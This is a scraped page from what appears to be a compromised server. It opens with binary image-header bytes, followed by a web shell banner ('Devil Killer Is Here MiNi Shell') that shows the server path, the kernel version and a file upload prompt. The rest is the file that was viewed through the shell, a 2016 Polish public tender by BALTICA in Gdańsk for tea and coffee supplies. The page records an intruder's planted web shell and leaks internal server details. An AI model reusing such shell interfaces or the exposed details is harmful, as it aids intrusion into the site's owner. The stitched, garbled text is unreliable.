JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160726/157331-N-2016.html

<p class="kh_header"><b>Gdańsk: Dostawy herbaty i kawy:znak sprawy: 6/2016/BIGB O/POTULICE</b><br>
<b>Numer ogłoszenia: 157331 - 2016; data zamieszczenia: 26.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Bałtycka Instytucja Gospodarki Budżetowej BALTICA , ul. Kurkowa 12, 80-803 Gdańsk, woj. pomorskie, tel. 58 728 70 00, faks 58 728 70 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> igbbaltica.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: igb.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy herbaty i kawy:znak sprawy: 6/2016/BIGB O/POTULICE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> L.p.
Przedmiot zamówienia
j.m.
Ilość szacunkowa
1
Herbata czarna granulowana Saga, waga netto opakowania 90 g. Herbata o wyjątkowej kompozycji herbat granulowanych, które nadają naparowi moc oraz wyśmienity smak i aromat. CPV: 15863200-7.
op.
3000
2
Herbata czarna ekspresowa Saga, 90 okrągłych torebek w opakowaniu, waga 1 torebki 1,4 g, waga netto opakowania 12,6 g . CPV: 15864100-3.
op.
2000
3
Herbata owocowa ekspresowa aromatyzowana Saga (miks smaków, w tym: malinowa, cytrynowa, porzeczkowa, itp.), 25 okrągłych torebek w opakowaniu, waga 1 torebki 1,8 g, waga netto opakowania 45 g. CPV: 15864100-3.
op.
4000
4
Herbata czarna ekspresowa Lipton Yellow Label, 25 torebek w opakowaniu, waga 1 torebki z nitką umożliwiającą jej wyciągnięcie - 2 g, waga netto opakowania 50 g. CPV: 15864100-3.
op.
500
5
Herbata czarna ekspresowa Lipton Yellow Label, 50 torebek w opakowaniu, waga 1 torebki z nitką umożliwiającą jej wyciągnięcie - 2 g. CPV: 15864100-3.
op.
1000
6
Herbata czarna liściasta sypka Lipton Yellow Label, waga netto opakowania 100 g. CPV: 15863200-7.
op.
500
7
Herbata czarna granulowana, waga netto opakowania 80 g, mieszanka herbat czarnych. CPV: 15863200-7.
op.
2500
8
Herbata czarna ekspresowa, 100 okrągłych torebek w opakowaniu, waga 1 torebki 1,5 g, waga netto opakowania 150 g, mieszanka herbat czarnych. CPV: 15864100-3.
op.

8000
9
Herbata czarna liściasta łamana Madras Posti, waga netto opakowania 100 g, mieszanka herbat indyjskich, uprawianych głównie w dorzeczu Brahmaputry. Herbata z pędów młodych listków. CPV: 15863200-7.
op.
300
10
Herbata czarna liściasta Yunan Posti, waga netto opakowania 100 g, herbata stworzona z gatunków herbat chińskich. CPV: 15863200-7.
op.
300
11
Herbata czarna liściasta łamana Earl Grey Posti, waga netto opakowania 100 g, kompozycja herbat chińskich i indyjskich wzbogacona aromatem bergamotowym. CPV: 15863200-7.
op.
500
12
Herbata zielona liściasta , duże zwinięte liście (miks smaków, w tym: cytryna aromatyzowana, malina, itp.), waga netto opakowania 100 g. CPV: 15863100-6.
op.
1500
13
Herbata zielona liściasta , duże zwinięte liście, o smaku opuncji figowej, waga netto opakowania 100 g. CPV: 15863100-6.
op.
1500
14
Herbata zielona liściasta , duże zwinięte liście, oryginalna, waga netto opakowania 100 g. CPV: 15863100-6.
op.
1500
15
Herbata ziołowa - miętowa ekspresowa , 20 torebek w opakowaniu, waga 1 torebki 1,0 g, waga netto opakowania 20 g. Produkowana w systemie HACCP i ISO 9001:2000. CPV: 15865000-9.
op.
1440
16
Herbata ziołowa - melisa ekspresowa, 20 torebek w opakowaniu, waga 1 torebki 1,5 g, waga netto opakowania 30 g, CPV: 15865000-9.
op.
1000
17
Herbata ziołowa - rumianek (chamaemelum nobile) ekspresowa, 20 torebek w opakowaniu, waga 1 torebki 1,0 g, waga netto opakowania 20 g, CPV: 15865000-9.
op.
500
18
Herbata ziołowa - dziurawiec  ekspresowa, 20 torebek w opakowaniu, waga netto opakowania 20 g, CPV: 15865000-9.
op.
400
19
Herbata owocowa expresowa, różne smaki, 20 torebek w opakowaniu, waga netto opakowania 20 g, CPV: 15865000-9.
op.
500
20
Kawa naturalna drobno mielona MK Cafe Premium, waga netto opakowania 500 g. Kawa do parzenia metodą tradycyjną oraz w ekspresie. Smak i aromat zawdzięcza unikalnej kompozycji ziaren Arabiki z najlepszych plantacji w Ameryce Południowej i Środkowej. Pakowana w atmosferze ochronnej. CPV: 15861000-1.
op.
800
21
Kawa rozpuszczalna Nescafe classic, waga netto opakowania 100 g. Szklane opakowanie. Oryginalny smak i aromat dzięki doskonałej kompozycji ziaren arabiki i robusty. 100 g kawy zawiera m.in.: 25 g antyoksydantów oraz 36 g węglowodanów, wartość energetyczna w 100 g - 63 kcal. CPV: 15861000-1.
op.
600
22
Kawa mielona Cafe Prima Finezja Delikatna i harmonijna, waga netto opakowania 100 g. Kompozycja gatunków kawy z rejonów tropikalnych Afryki i Dalekiego Wschodu. Kawa do parzenia metodą tradycyjną oraz w ekspresie. Kawa pakowana w atmosferze ochronnej. Kawa mielona PN-93 A-76100, jakość gwarantowana przez ISO 9001, HACCP. CPV: 15861000-1.
op.
1500
23
Kawa mielona Cafe Prima Finezja Delikatna i harmonijna, waga netto opakowania 250 g. Kompozycja gatunków kawy z rejonów tropikalnych Afryki i Dalekiego Wschodu. Kawa do parzenia metodą tradycyjną oraz w ekspresie. Kawa pakowana w atmosferze ochronnej. Kawa mielona PN-93 A-76100, jakość gwarantowana przez ISO 9001, HACCP. CPV: 15861000-1.
op.
5000
24
Kawa mielona Café Prima Finezja Delikatna i harmonijna, waga netto opakowania 500 g. Kompozycja gatunków kawy z rejonów tropikalnych Afryki i Dalekiego Wschodu. Kawa do parzenia metodą tradycyjną oraz w ekspresie. Kawa pakowana w atmosferze ochronnej. Kawa mielona PN-93/A-76100, jakość gwarantowana przez ISO 9001, HACCP. CPV: 15861000-1.
op.
7000
25
Kawa naturalna mielona Fort Strong Coffee, waga netto opakowania 250 g. Kawa do parzenia metodą tradycyjną oraz w ekspresie. Wartość energetyczna w 100 g - 427 kcal. CPV: 15861000-1.
op.
1500
26
Kawa naturalna mielona Fort Strong Coffee, waga netto opakowania 500 g. Kawa do parzenia metodą tradycyjną oraz w ekspresie. Wartość energetyczna w 100 g - 427 kcal. CPV: 15861000-1.
op.
1000
27
Kawa naturalna mielona Pedros Active, waga netto opakowania 250 g. Kawa do parzenia metodą tradycyjną oraz w ekspresie. Mieszanka z najlepszych gatunków ziaren. Kawa mielona PN-93/A-76100. CPV: 15861000-1.
op.
1000
28
Kawa naturalna mielona Pedros Active, waga netto opakowania 500 g. Kawa do parzenia metodą tradycyjną oraz w ekspresie. Mieszanka z najlepszych gatunków ziaren. Kawa mielona PN-93/A-76100. CPV: 15861000-1.
op.
2000
29
Kawa mielona Tchibo Family Classic, waga netto opakowania 250 g, kawa pakowana próżniowo. Kawa mielona PN-93/A-76100. CPV: 15861000-1.
op.
3500
30
Kawa drobno mielona Jacobs Kronung, waga netto opakowania 250 g. Kawa do parzenia metodą tradycyjną oraz w ekspresie. Kawa pakowana próżniowo. 100 ml kawy zawiera 120 mg przeciwutleniaczy. CPV: 15861000-1.
op.
1500
31
Kawa naturalna drobno mielona MK Cafe Premium, waga netto opakowania 225 g. Kawa do parzenia metodą tradycyjną oraz w ekspresie. Smak i aromat zawdzięcza unikalnej kompozycji ziaren Arabiki z najlepszych plantacji w Ameryce Południowej i Środkowej. Pakowana w atmosferze ochronnej. CPV: 15861000-1.
op.
1500
32
Kawa drobno mielona Maxwell House, waga netto opakowania 250 g. Kawa do parzenia metodą tradycyjną oraz w ekspresie. Kawa w opakowaniu próżniowym. CPV: 15861000-1.
op.
1100
33
Kawa drobno mielona Maxwell House, waga netto opakowania 500 g. Kawa do parzenia metodą tradycyjną oraz w ekspresie. Kawa w opakowaniu próżniowym. CPV: 15861000-1.
op.
3000
34
Kawa rozpuszczalna Maxwell House, waga netto opakowania 100 g. Szklane opakowanie. Kawa rozpuszczalna aromatyzowana - 100 % kawy naturalnej pochodzącej z górskich plantacji, 100 ml kawy zawiera 30 mg przeciwutleniaczy. CPV: 15861000-1.
op.
300
35
Kawa rozpuszczalna Jacobs Kronung, waga netto opakowania 100 g. Szklane opakowanie. Kawa rozpuszczalna - 100 % kawy naturalnej. Kawa liofilizowana. 100 ml kawy zawiera 30 mg przeciwutleniaczy. CPV: 15861000-1.
op.
150
36
Kawa rozpuszczalna Tchibo Famili Classic, waga netto opakowania 10 0g. Szklane opakowanie. Kawa rozpuszczalna aromatyzowana - 100 % kawy naturalnej. Zawartość opakowania starczy na sporządzenie około 60 filiżanek kawy. CPV: 15861000-1.
op.
288
37
Kawa rozpuszczalna Nescafe classic, waga netto opakowania 200 g. Szklane opakowanie. Oryginalny smak i aromat dzięki doskonałej kompozycji ziaren arabiki i robusty, 100 g kawy zawiera m.in.: 25 g antyoksydantów oraz 36 g węglowodanów, wartość energetyczna w 100 g - 63 kcal. CPV: 15861000-1.
op.
1000
38
Rozpuszczalny napój kawowy Nescafe classic 3 w 1, waga netto opakowania 18g, opakowanie zbiorcze - 10 szt. po 17,5 g. W skład rozpuszczalnego napoju kawowego wchodzi m.in.: kawa rozpuszczalna 10,6 %, cukier, odtłuszczone mleko w proszku. . CPV: 15862000-8.
op.
1000 op.zbiorczych po 10 szt
39
Rozpuszczalny napój kawowy Nescafe classic 2 w 1, waga netto opakowania 10g, opakowanie zbiorcze - 10 szt. po 10 g. CPV: 15862000-8.
op.
1000 op.zbiorczych po 10 szt
40
Kawa zbożowa expresowa 20 torebek, po 4,2 g, waga netto opakowania 84 g CPV: 15862000-8.
op.
300
41
Rozpuszczalna kawa zbożowa Inka, waga netto opakowania 150 g. Skład: jęczmień, żyto, cykoria (zboża ogółem 72 %), burak cukrowy - prażony. Zawartość opakowania starczy na sporządzenie około 75 filiżanek kawy. CPV: 15862000-8.
op.
1500
42
Napój kawowy Mokate Cappuccino Maestro Renato Bonui, waga netto opakowania 110 g. Napój kawowy o smaku waniliowym (vanilla). Skład m.in.: cukier, syrop glukozowy, mleko odtłuszczone w proszku, tłuszcz roślinny, tłuszcz roślinny utwardzony, ekstrakt kawy zbożowej (ekstrakt prażonego jęczmienia i żyta), rozpuszczalny ekstrakt kawy (3%), serwatka w proszku, 100g napoju kawowego zawiera m.in.: 16,3 g tłuszczu, wartość energetyczna w 100 g - 457 kcal. CPV: 15862000-8.
op.
400
43
Napój kawowy Mokate Cappuccino Maestro Renato Bonui, waga netto opakowania 110g. Napój kawowy o smaku śmietankowym (cream). Skład m.in.: cukier, syrop glukozowy, mleko odtłuszczone w proszku, tłuszcz roślinny, tłuszcz roślinny utwardzony, ekstrakt kawy zbożowej (ekstrakt prażonego jęczmienia i żyta), rozpuszczalny ekstrakt kawy (8%), serwatka w proszku, 100g napoju kawowego zawiera m.in.: 14,5g tłuszczu, wartość energetyczna w 100g - 441 kcal. CPV: 15862000-8.
op.
400
44
Napój kawowy Mokate Cappuccino Maestro Renato Bonui, waga netto opakowania 110 g. Napój kawowy o smaku oryginalna receptura (classic). Skład m.in.: syrop glukozowy, cukier, tłuszcz roślinny utwardzony, mleko odtłuszczone w proszku, ekstrakt kawy zbożowej, naturalna kawa rozpuszczalna (min. 8%), 100 g napoju kawowego zawiera m.in.: 10 g tłuszczu, wartość energetyczna w 100 g - 422 kcal. CPV: 15862000-8.
op.
400
45
TCHIBO Gala Ulubiona kawa mielona waga netto opakowania 250 g. Kawa do parzenia metodą tradycyjną . Kawa pakowana próżniowo. CPV: 15861000-1.
op.
10000
46
TCHIBO Gala Ulubiona kawa mielona waga netto opakowania 500 g. Kawa do parzenia metodą tradycyjną . Kawa pakowana próżniowo. CPV: 15861000-1.
op.
10000
47
TCHIBO Gala Ulubiona kawa mielona waga netto opakowania 100 g. Kawa do parzenia metodą tradycyjną . Kawa pakowana próżniowo. CPV: 15861000-1.
op.
1500
48
Woseba Kawa  naturalna mielona rodzinna 80 g  CPV: 15861000-1.
op.
1500
49
Woseba Kawa  naturalna mielona rodzinna 250 g  CPV: 15861000-1.
op.
2000
50
Woseba Kawa  naturalna mielona rodzinna 450 g  CPV: 15861000-1.
op.
10000
51
Kawa Cafe Prima Śniadaniowa kawa rozpuszczalna 20% i kawa zbożowa 80% lekka i łagodna, 100 g CPV: 15862000-8.

op.
900
52
Kawa Cafe Prima Śniadaniowa kawa rozpuszczalna 20% i kawa zbożowa 80% lekka i łagodna, 200 g CPV: 15862000-8.

op.
1000
53
Kawa Nescafe  rozpuszczalna w miękkim opakowaniu 75 g . CPV: 15861000-1.
op.
600.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.86.32.00-7, 15.86.10.00-1, 15.86.50.00-9, 15.86.20.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2) posiadania wiedzy i doświadczenia;
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4) sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą brak podstaw do wykluczenia z niniejszego postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp.
3.	Opis sposobu dokonywania oceny spełniania warunków w niniejszym postępowaniu.
1)	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2)	Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ust. 1 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2) posiadania wiedzy i doświadczenia;
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4) sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą brak podstaw do wykluczenia z niniejszego postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp.
3.	Opis sposobu dokonywania oceny spełniania warunków w niniejszym postępowaniu.
1)	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2)	Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ust. 1 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2) posiadania wiedzy i doświadczenia;
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4) sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą brak podstaw do wykluczenia z niniejszego postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp.
3.	Opis sposobu dokonywania oceny spełniania warunków w niniejszym postępowaniu.
1)	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2)	Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ust. 1 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2) posiadania wiedzy i doświadczenia;
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4) sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą brak podstaw do wykluczenia z niniejszego postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp.
3.	Opis sposobu dokonywania oceny spełniania warunków w niniejszym postępowaniu.
1)	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2)	Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ust. 1 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2) posiadania wiedzy i doświadczenia;
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4) sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą brak podstaw do wykluczenia z niniejszego postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp.
3.	Opis sposobu dokonywania oceny spełniania warunków w niniejszym postępowaniu.
1)	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2)	Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ust. 1 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

